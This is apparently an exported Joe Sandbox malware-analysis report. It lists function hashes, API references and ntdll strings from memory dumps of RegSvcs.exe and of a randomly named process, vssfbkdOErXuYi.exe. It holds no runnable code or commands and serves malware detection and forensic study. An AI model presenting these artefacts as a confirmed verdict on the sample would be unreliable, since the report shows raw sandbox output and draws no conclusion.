Opcode ID: d0c2d2c0dbc9c52437f4aae5de4c0d5f193bfd2c8a16cafef58ed45c62cd7cfb
Instruction ID: 27abf04c3a6c374ab9c198065e7ff03cb0d73c7845e39cc820a00c30a9a65359
Opcode Fuzzy Hash: d0c2d2c0dbc9c52437f4aae5de4c0d5f193bfd2c8a16cafef58ed45c62cd7cfb
Instruction Fuzzy Hash: BB900221A0580846D18171585818706001597D1301F55D011A1028598DC6598BD967A2

Function 017F2CA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b31a61e6f26931487b2ee4c2b288f8746c0045294260771c1a72912eb7ccc92e
Instruction ID: 2cdb49ac62c5af480c28f4af410a9e4a084edb2a876c692b3c8f5958334d2f82
Opcode Fuzzy Hash: b31a61e6f26931487b2ee4c2b288f8746c0045294260771c1a72912eb7ccc92e
Instruction Fuzzy Hash: E790023160180846D14175985808646000597E1301F55D011A6028599EC6658AD56232

Function 017F2F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfc9abd49257e7d7f4f9cf557dc3d82cff9047eb62c1ebd0cfbdd29191091c5d
Instruction ID: f82a76f492ab37eccfcea493af8ed0055d5420e14be5079b97f68916126b41f7
Opcode Fuzzy Hash: cfc9abd49257e7d7f4f9cf557dc3d82cff9047eb62c1ebd0cfbdd29191091c5d
Instruction Fuzzy Hash: 8590026161180486D14571584804706004597E2301F55C012A3158598CC5298EE55226

Function 017F2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 641860a70d2af402ac1370f8c5c12d871be11c62d187a519278ce77f44e5921f
Instruction ID: a4d0a6db818bdd7f7c7a21560c1b74f2497fbe248fba73dbdcd1bdb0c4a78821
Opcode Fuzzy Hash: 641860a70d2af402ac1370f8c5c12d871be11c62d187a519278ce77f44e5921f
Instruction Fuzzy Hash: 5A90026174180886D14171584814B060005D7E2301F55C015E2068598DC619CED66227

Function 017F2FE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56a6df27c3d052e1e5fae3526d4ba17fec67157500905f42979f3363271d880c
Instruction ID: b913536ec9f3f1be1dddd8c12bc41d93b55f54b72aef8cdf075e1a8d230de778
Opcode Fuzzy Hash: 56a6df27c3d052e1e5fae3526d4ba17fec67157500905f42979f3363271d880c
Instruction Fuzzy Hash: F7900221611C0486D24175684C14B07000597D1303F55C115A1158598CC9158AE55622

Function 017F2FB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73136c98f43d1d91d10e9f94952ab754bc390a86867779c326533ed582630a4b
Instruction ID: 9a627072c23d90c23d165523752f76d67d85cc02daca1105c16ff6eddde5080a
Opcode Fuzzy Hash: 73136c98f43d1d91d10e9f94952ab754bc390a86867779c326533ed582630a4b
Instruction Fuzzy Hash: 6D900221A0180486418171688C449064005BBE2311755C121A199C594DC5598AE95766

Function 017F2FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8fab87b18e5acb88cbb4af280285b1abec4f7423b3c693a799cff51ed861e34
Instruction ID: b23bd7138ef928b543c671f0d1cd27200630883d4c1477e2665bb813ff7b40fb
Opcode Fuzzy Hash: e8fab87b18e5acb88cbb4af280285b1abec4f7423b3c693a799cff51ed861e34
Instruction Fuzzy Hash: 21900231601C0846D14171584C08747000597D1302F55C011A6168599EC665CAD56632

Function 017F2F90 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b226687520958f6a2209837777d6b6a79305960e52ff16dc9bedb9b4ebf0318
Instruction ID: e00d658917d023d6f233a8ed9043c59e4084c71e8c24db18177c15c9e32fb4ce
Opcode Fuzzy Hash: 0b226687520958f6a2209837777d6b6a79305960e52ff16dc9bedb9b4ebf0318
Instruction Fuzzy Hash: 14900231601C0846D14171584C1470B000597D1302F55C011A2168599DC6258AD56672

Function 017F2E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60fa75ea4361bddd6ee11e7de6fba35e9c3f00eb2455216c95c2badc5611d5c4
Instruction ID: 82409ad49904898f3e7f19c1e10ec270c9d960d749255105af4009f1bd4cd471
Opcode Fuzzy Hash: 60fa75ea4361bddd6ee11e7de6fba35e9c3f00eb2455216c95c2badc5611d5c4
Instruction Fuzzy Hash: EE90022170180846D143715848146060009D7D2345F95C012E2428599DC6258BD7A233

Function 017F2EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69a14328d3d22093a8ecdb3e1a705c6827ee3cd95609df344d660184412ed29b
Instruction ID: 6711548d48261f4b12db385fa80e191136452fef6d506d5070e10bb128ca2e29
Opcode Fuzzy Hash: 69a14328d3d22093a8ecdb3e1a705c6827ee3cd95609df344d660184412ed29b
Instruction Fuzzy Hash: AC900261601C0847D18175584C04607000597D1302F55C011A3068599ECA298ED56236

Function 017F2EA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3467e5a07890e7412d08e7e870aa1d3281cd684189330e7986ff27dbb65423ab
Instruction ID: 222bb3f500d4bf018093dc4ce3760c580e7f2bdaad606566cb3f477d6d46ee71
Opcode Fuzzy Hash: 3467e5a07890e7412d08e7e870aa1d3281cd684189330e7986ff27dbb65423ab
Instruction Fuzzy Hash: E390027160180846D18171584804746000597D1301F55C011A6068598EC6598FD96766

Function 017F2E80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8f2c3ff603bebd23fc93daf9f18f74572165fed9776bcc78e8154a41f411bc8
Instruction ID: bb31b81b0794322a69ef93f94800630bf44ea9a0d15105c1890e6308f28dc459
Opcode Fuzzy Hash: e8f2c3ff603bebd23fc93daf9f18f74572165fed9776bcc78e8154a41f411bc8
Instruction Fuzzy Hash: 9A900221A0180946D14271584804616000A97D1341F95C022A2028599ECA258BD6A232

Function 017F3010 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d0e370451a58af7a5ac2e3ced48faecff3809cb58df837c09bd61fd6d9f8f8b
Instruction ID: 6e249a9896edafd501cb393e29a2f92023216206866f0b40345cf2ab6a0f7d99
Opcode Fuzzy Hash: 1d0e370451a58af7a5ac2e3ced48faecff3809cb58df837c09bd61fd6d9f8f8b
Instruction Fuzzy Hash: 5E900221601C4886D18172584C04B0F410597E2302F95C019A515A598CC9158AD95722

Function 017F3090 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43dd9228634622503501fcad638ddf8ce4e5066e30daa3538b4a8969c5fb6510
Instruction ID: fc541077a0d83ff8b94acc1acf932c66cb00c24155d5988a038730a66356fb0d
Opcode Fuzzy Hash: 43dd9228634622503501fcad638ddf8ce4e5066e30daa3538b4a8969c5fb6510
Instruction Fuzzy Hash: 0D90022164180C46D181715888147070006D7D1701F55C011A1028598DC6168BE967B2

Function 017F39B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b371249599b364801158884fcfd54e71323cd9a22b4e429caabeff8395c401a5
Instruction ID: 0eef84c09978e5b2985266d489352061cdc54504714e8c18a7949f1f0808069c
Opcode Fuzzy Hash: b371249599b364801158884fcfd54e71323cd9a22b4e429caabeff8395c401a5
Instruction Fuzzy Hash: 8490022164585546D191715C48046164005B7E1301F55C021A18185D8DC5558AD96322

Function 017F3D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e2e0ad6a52ecad45d0911402071e8526c51a605330d7c2d2c194ef613fee778
Instruction ID: 1580abd6808c38704b559f59a510a2e0d724e086861973062a9ffc127d7beb02
Opcode Fuzzy Hash: 9e2e0ad6a52ecad45d0911402071e8526c51a605330d7c2d2c194ef613fee778
Instruction Fuzzy Hash: 8690023560180846D55171585C04646004697D1301F55D411A142859CDC6548AE5A222

Function 017F3D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df89252425f1bbd3132ce5a6cf0cdfee82284eb8c7541d63aa26de1d1bd48eff
Instruction ID: e360cfc43fedf6735e92d177f2931d33326ac28e3b0c5802b915456c74fdca02
Opcode Fuzzy Hash: df89252425f1bbd3132ce5a6cf0cdfee82284eb8c7541d63aa26de1d1bd48eff
Instruction Fuzzy Hash: EC90023160280586958172585C04A4E410597E2302B95D415A1019598CC9148AE55322

Function 017F2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 6d8dbbeb03ccdc202684afec932dd3e6875317253d05eb7b23d57356a7cf1211
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 017F2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 017F293C
___swprintf_l.LIBCMT ref: 017F295E
___swprintf_l.LIBCMT ref: 017F29A3
___swprintf_l.LIBCMT ref: 0182A52E

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 0182A54E
:%u.%u.%u.%u, xrefs: 0182A5B8
ffff:, xrefs: 0182A504
::%hs%u.%u.%u.%u, xrefs: 0182A527

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 12f1fb3187dde207b34df1c2011f0e4ab8fe05898b2a24b5367935f66e87e36b
Instruction ID: c80e5407fd37c4ea3255381c831aaac5b2857b3570c342a0ad276925b3f63576
Opcode Fuzzy Hash: 12f1fb3187dde207b34df1c2011f0e4ab8fe05898b2a24b5367935f66e87e36b
Instruction Fuzzy Hash: 6B51C3A6A00156AFCB15DBAC899097FFBB8BB48340B54826DF5A5E7642D334DE4087A0

Function 01862410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 018624A6
___swprintf_l.LIBCMT ref: 018624E2
___swprintf_l.LIBCMT ref: 0186257D
___swprintf_l.LIBCMT ref: 018625A3
___swprintf_l.LIBCMT ref: 018625C8
___swprintf_l.LIBCMT ref: 01862608

Strings

::%hs%u.%u.%u.%u, xrefs: 0186249E
:%u.%u.%u.%u, xrefs: 018625FF
::ffff:0:%u.%u.%u.%u, xrefs: 018624DA
ffff:, xrefs: 0186247D, 0186249D

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 01ec8126e9c4842cac0719f0f9bc1976444c523e5a7c0f496b3a7f2222f66cb6
Instruction ID: 97e7a87435c2a6639e44d516a4062d2526f1c9541d1627f05def87b69013f836
Opcode Fuzzy Hash: 01ec8126e9c4842cac0719f0f9bc1976444c523e5a7c0f496b3a7f2222f66cb6
Instruction Fuzzy Hash: 0C51E4B5A0064AAECB71DF9CC89097EFBFEEB44300B4484A9F5D6D7681E674DB408760

Function 017E7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

Execute=1, xrefs: 01824713
CLIENT(ntdll): Processing section info %ws..., xrefs: 01824787
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01824725
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01824742
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018246FC
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01824655
ExecuteOptions, xrefs: 018246A0

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 172ae3c625e59b39f01d01d16b8c26f623a4f03d0fe354db5eb9e35782974c1f
Instruction ID: 1c183e388f609b77be03d3750b3f40ea4c3a4682201ed198086f84249514009c
Opcode Fuzzy Hash: 172ae3c625e59b39f01d01d16b8c26f623a4f03d0fe354db5eb9e35782974c1f
Instruction Fuzzy Hash: DC513D7160021ABAEF15AAA8DC9DFAAB7E8EF18304F0400D9D605EB191D7709B45CF91

Function 01886940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
Instruction ID: 871ff34a27eaacfc46643e2b4c32b9273d8201001fdef8d70870fd9d499a0719
Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
Instruction Fuzzy Hash: 6B021671508342AFD305EF18C494A6BBBF5FFC4714F248A2DBA958B254EB31EA05CB52

Function 017FB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 017FB6BF

Strings

-, xrefs: 017FB650
0, xrefs: 017FB66F
+, xrefs: 017FB65A
0, xrefs: 017FB695

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction ID: 7940fe1683dbd4291575a3d227d7bcf7927c43b364d894cd73c445cbaea726ef
Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction Fuzzy Hash: D5819070E452499EEF258E6CC8917FFFBB2AF85360F18415EDA61A7391C73498408BA1

Function 018620E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0186214F
___swprintf_l.LIBCMT ref: 01862172

Strings

%%%u, xrefs: 01862146
[, xrefs: 0186212B
]:%u, xrefs: 01862169

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: b146c7939c0313dc21d90b9a0d2cebbdc7f780647334cf2f298b00ce63a3d587
Instruction ID: ab6462f36a7106f727bc6c0b6ea80fdb59040ed728bed7c50b891e87836e1474
Opcode Fuzzy Hash: b146c7939c0313dc21d90b9a0d2cebbdc7f780647334cf2f298b00ce63a3d587
Instruction Fuzzy Hash: 1E2151BAE00519ABDB11DF69CC54AEFBBEDAF54744F44015AEA45E3240E730EB018BA1

Function 017DF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018202E7
RTL: Re-Waiting, xrefs: 0182031E
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018202BD

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: da8633041bc887424129f4bba21177617743f4b3cd24b8def9180418e54ec9f4
Instruction ID: 07cc5553217f9d871a22fb2c16197d940198d047c0051799b55f3cc4f8b0b6e6
Opcode Fuzzy Hash: da8633041bc887424129f4bba21177617743f4b3cd24b8def9180418e54ec9f4
Instruction Fuzzy Hash: A7E19E706047459FD726CF28C884B6ABBF0BB85324F140A5DF5A6CB2E1D774D986CB42

Function 017EBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01827B7F
RTL: Resource at %p, xrefs: 01827B8E
RTL: Re-Waiting, xrefs: 01827BAC

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 98abcca7ab09bbd69338ec84893a8d30bdbe1c3ae7dbe50eb19ee95dd502e5b7
Instruction ID: 0bb03510772bba8bca81309fde8bf4627509714802656a2eee324ae0e02d2fa4
Opcode Fuzzy Hash: 98abcca7ab09bbd69338ec84893a8d30bdbe1c3ae7dbe50eb19ee95dd502e5b7
Instruction Fuzzy Hash: 104103317007029FDB25DE29C854B2BFBE5EF98710F000A1DFA56DB280DB31E9458B92

Function 017EB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0182728C

Strings

RTL: Resource at %p, xrefs: 018272A3
RTL: Re-Waiting, xrefs: 018272C1
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01827294

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: d79124fa9bda84615506aaf63aa1aa97a77556c6e5edef6613a54e8f02cf4ee5
Instruction ID: 35e21c8109c119e11f954a715d99a5be9ff7c242dc349223d67dda156beb8c1b
Opcode Fuzzy Hash: d79124fa9bda84615506aaf63aa1aa97a77556c6e5edef6613a54e8f02cf4ee5
Instruction Fuzzy Hash: C6411431700217ABD712DE2ACC41B66BBE5FFAA710F100619F956DB240DB30F99587D1

Function 01862300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0186238D
___swprintf_l.LIBCMT ref: 018623B3

Strings

]:%u, xrefs: 018623AA
%%%u, xrefs: 01862384

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 6230ab7b038e74506e776a6feaf0e645c57f6adcf28637edf8798bcb13520b3a
Instruction ID: 191ab5de8ede591baf6a8193c2856fb3cc8e92b2d2f2abcd787f0c55ca67efef
Opcode Fuzzy Hash: 6230ab7b038e74506e776a6feaf0e645c57f6adcf28637edf8798bcb13520b3a
Instruction Fuzzy Hash: F3318472A002199FDB20DE2DDD40BEEB7FDEB54750F84059AE949E3240EB309B448BA1

Function 017F7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 017F7E8B

Strings

+, xrefs: 017F7DE8
-, xrefs: 017F7DDD

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction ID: 562715d85ac5699b53b40035b55df5ad4c5fda1ab5b675ac0e85313eb4dcae7a
Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction Fuzzy Hash: D5919171E0020A9AEB28DF6DC881ABFFBE5AF44320F54461EEB65E73C4D73099428751

Function 017B9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 017B9191
@, xrefs: 017B9175

Memory Dump Source

Source File: 00000008.00000002.1896121941.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1780000_RegSvcs.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: f4899bfc75a804eef6b9ba33fdf8ae3c9b43bccd0ad44acef2d27be3a4744226
Instruction ID: a89ee2d04035de079721fb1e00db838915c38f37c0a4f023095783030e98704e
Opcode Fuzzy Hash: f4899bfc75a804eef6b9ba33fdf8ae3c9b43bccd0ad44acef2d27be3a4744226
Instruction Fuzzy Hash: E6811DB2D002699BDB31CB54CC45BEEB7B9AF48754F1041DAEA19B7284E7305E84DFA0

Analysis Process: vssfbkdOErXuYi.exePID: 7340, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	8.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	28
Total number of Limit Nodes:	4

Executed Functions

Function 02B2D5A0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 02B2D61E
GetCurrentThread.KERNEL32 ref: 02B2D65B
GetCurrentProcess.KERNEL32 ref: 02B2D698
GetCurrentThreadId.KERNEL32 ref: 02B2D6F1

Memory Dump Source

Source File: 00000009.00000002.1919525871.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2b20000_vssfbkdOErXuYi.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 15e756ea0653dae5efdce2678c40d3759caa71dcf608d6a09a708c2ad3dfc1e5
Instruction ID: 57a9c55b212295616696bde7b65e22f4277e7836851d726f09866b88cc046e4e
Opcode Fuzzy Hash: 15e756ea0653dae5efdce2678c40d3759caa71dcf608d6a09a708c2ad3dfc1e5
Instruction Fuzzy Hash: 1D5155B0A003498FDB15DFA9D548BDEBBF1EB88304F20C599E409A7360DB349984CF65

Function 02B244D4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02B259A9

Memory Dump Source

Source File: 00000009.00000002.1919525871.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2b20000_vssfbkdOErXuYi.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: deb7750e1832bef95949d013cd0f356b49ef582fc918762043696107670096e1
Instruction ID: 5e787f0456e943d7c68f8ed551d24085105a8edc0a79c7ec29267337d927cbe0
Opcode Fuzzy Hash: deb7750e1832bef95949d013cd0f356b49ef582fc918762043696107670096e1
